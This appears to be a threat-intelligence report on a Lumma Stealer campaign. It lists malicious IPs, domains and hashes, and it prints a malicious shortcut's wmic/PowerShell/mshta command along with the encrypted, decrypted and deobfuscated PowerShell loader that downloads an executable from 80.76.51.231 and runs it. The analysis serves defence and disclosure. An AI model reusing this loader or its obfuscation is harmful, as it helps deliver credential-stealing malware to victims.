Add 87.120.115.240 - lumma stealer - malware

[g0d33p3rsec]

Phishing Domain/URL/IP(s):

80.76.51.231
87.120.115.240
3xp3cts1aim.sbs
befall-sm0ker.sbs
librari-night.sbs
owner-vacat10n.sbs
p10tgrace.sbs
p3ar11fter.sbs
peepburry828.sbs
processhol.sbs
smiteattacekr.org
tripeggyun.fun
http://87.120.115.240/Downloads/tg.-frumos-hcl-nr.-75-1.pdf.lnk
https://80.76.51.231/Samarik
https://80.76.51.231/Kompass-4.1.2.exe

Impersonated domain

Describe the issue

Filename	sha256
tg.-frumos-hcl-nr.-75-1.pdf.lnk	bb2e14bb962873722f1fd132ff66c4afd2f7dc9b6891c746d697443c0007426a
Samarik	40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15
Kompass-4.1.2.exe	e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2

tg.-frumos-hcl-nr.-75-1.pdf.lnk -> Wmic -> powershell iex -> Mshta -> https://80.76.51.231/Samarik | powershell -> https://80.76.51.231/Kompass-4.1.2.exe

I found a malicious .lnk file that contains the following:

"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"

The second stage is a powershell script containing:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '174CF4CF031B3EE6D86D7FE428DECB3684BEFFA8D875ABFAB56D88D00DE8901BBF54DE073C987CFE6EC0E87F43B8758624CB7FD57E3B89CAC346FE956D2EBB095ADB35BB591120747A07283513B3063B5B9B219F1A329D11476680464B5C661DD2C36459509F8ED7BEA9E5B36CAADDC8A06712AAA5116779400C90CA52BF05DDCAC8D8D982F967CE2711B37D281EB0F6E5E232B87E56B47AD9C41A2E337DE3E8F26553A62B52A451FC284BF35ED2165314E91B05F708D2F8660F05A5E8C26E66E716B7BF039E0C086293A5ADB939D266BA7071A570BF5308E47CDA15E0EA35A10BA504EB12874E4CD8D36B40E03BB1E42EE829672A6283B327EAA6E1A91A325D812402D6F533CA0A7C5002C629D6EDF22C9EC3EC4ABFEB6D58C44AE426D715DF9B5FFAE086A8283C99BD232E25C8BB96E3012C51EFBCB7A7FA21E792593F6C615AE9A92E7C58742699D27C294502361287B9DDF852F7BBF64C2C6AC8B78C5D4B3AFFF524FDB032A3163B0C4B53B8F3E73E32F28A56966658E55B9D4601402567A6A33EF3978576A136D4C72CDA41688DC1EA0A87B5250D422A292AEA0F9A9C5B6EB091B233F00DA237B06D4A961534D88A94E71ABF3F9D96830BD73445636D610C8A9ABF56E58F4FC66E3729D0308BF77340FA1C2C97CFFDB26253A6C4425B4984A8AE5D9ED9ADDA711867C96D058723CE97815EC3D33E291FD896D6DCC6FC34715F0C1545A3B05C5D821D717E8A69D49BEC5CC21D49E3C4A6893E8FB55DA9DD1DBE4022A020A25D8E86D80DACEF370AF5A1A8C855C9F758E711C90B46F5CF450FF9A83268EF0D48739BFAE7A9C33DC53C7B329F0B4885C00945FB9145C73D09B85F44E580C0773C177EB82C9A95D0C144F4DF47FC5B3E425875E6C3D09D5FE7C6C3F9D628F7213AE0F4675E57F906BF6E4E31CF61AC2DE9853504E6700F109D8512D1758191EC663467000DC1A6F07A7A734D77424B62754D57425070576770';function kCw ($lAxkDVr){return -split ($lAxkDVr -replace '..', '0x$& ')};$XvdhLtU = kCw($ddg.SubString(0, 1376));$apj = [System.Security.Cryptography.Aes]::Create();$apj.Key = kCw($ddg.SubString(1376));$apj.IV =  New-Object byte[] 16;$liRjFT = $apj.CreateDecryptor();$Brpsr = [System.String]::new($liRjFT.TransformFinalBlock($XvdhLtU, 0,$XvdhLtU.Length)); sal fd $Brpsr.Substring(3,3); fd $Brpsr.Substring(6)

The first 1376 characters of $ddg are the encrypted data and the remaining characters are the AES encryption key. $apj.IV = New-Object byte[] 16; sets the IV to 16 bytes of zeros. After decryption we are left with:

jfriEXfunction kCw($dZS, $kgu){sc $dZS $kgu -Encoding Byte};function Wzi($dZS){start $dZS };function lsp($pUY){$cGU = New-Object (iPP @(105,128,143,73,114,128,125,94,135,132,128,137,143));$kgu = $cGU.DownloadData($pUY);return $kgu};function iPP($Mnq){$MNL=27;$qyC=$Null;foreach($KtF in $Mnq){$qyC+=[char]($KtF-$MNL)};return $qyC};function hmL(){$qQe = $env:AppData + '\';;;$xjmNYNtvCOoH = $qQe + 'Kompass-4.1.2.exe'; if (Test-Path $xjmNYNtvCOoH){Wzi $xjmNYNtvCOoH;}Else{$ZselmcOkvJZW = lsp (iPP @(131,143,143,139,142,85,74,74,83,75,73,82,81,73,80,76,73,77,78,76,74,102,138,136,139,124,142,142,72,79,73,76,73,77,73,128,147,128));kCw $xjmNYNtvCOoH $ZselmcOkvJZW;Wzi $xjmNYNtvCOoH};;;}hmL;

We can further deobfuscate the second stage to:

function kCw($filePath, $content) {
    Set-Content $filePath $content -Encoding Byte
}

function Wzi($filePath) {
    Start-Process $filePath
}

function lsp($url) {
    $client = New-Object Net.WebClient
    return $client.DownloadData($url)
}

function iPP($values) {
    $shift = 27
    $output = ""
    foreach ($char in $values) {
        $output += [char]($char - $shift)
    }
    return $output
}

function hmL() {
    $AppDataPath = $env:AppData + '\Kompass-4.1.2.exe'

    if (Test-Path $AppDataPath) {
        Wzi $AppDataPath
    } else {
        $url = "https://80.76.51.231/Kompass-4.1.2.exe"
        $data = lsp $url
        kCw $AppDataPath $data
        Wzi $AppDataPath
    }
}

hmL;

The second stage downloads https://80.76.51.231/Kompass-4.1.2.exe and saves the file in AppData. Kompass-4.1.2.exe is detected by multiple engines as a variant of lumma stealer. We can enumerate a list of C2 domains through dynamic analysis.

Related external source

https://urlscan.io/result/ed1f38e2-1ba5-4149-b291-2002a19ec221/
https://app.any.run/tasks/dfa9206b-71f9-43ee-8b7f-94765e95bb19
https://www.virustotal.com/gui/domain/tripeggyun.fun/relations
https://www.virustotal.com/gui/domain/processhol.sbs/relations
https://www.virustotal.com/gui/domain/librari-night.sbs/relations
https://www.virustotal.com/gui/domain/befall-sm0ker.sbs/relations
https://www.virustotal.com/gui/domain/p10tgrace.sbs/relations
https://www.virustotal.com/gui/domain/peepburry828.sbs/relations
https://www.virustotal.com/gui/domain/owner-vacat10n.sbs/relations
https://www.virustotal.com/gui/domain/3xp3cts1aim.sbs/relations
https://www.virustotal.com/gui/domain/p3ar11fter.sbs/relations
https://www.virustotal.com/gui/file/bb2e14bb962873722f1fd132ff66c4afd2f7dc9b6891c746d697443c0007426a/details
https://www.virustotal.com/gui/url/6cf2009de72b333ff30e3ca4166e51db2c844c180d9df7302ea6aaa1ea63d2f7/details
https://www.virustotal.com/gui/url/1598c1362dde4fb5800bab7005148f50342e1f308a04bddb79c58ad5cb59e591/details
https://urlscan.io/search/#page.domain%3A87.120.115.240
https://urlscan.io/search/#page.domain%3A80.76.51.231

Screenshot

Click to expand

[g0d33p3rsec]

In the any run traffic, a connection to steamcommunity.com can be seen.

The VirusTotal relations show the URI as https://steamcommunity.com/profiles/76561199724331900.


If we rotate dxtepleelnpvc.zcr by 15 characters, we get smiteattacekr.org.

[g0d33p3rsec]

[g0d33p3rsec]

Related report: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure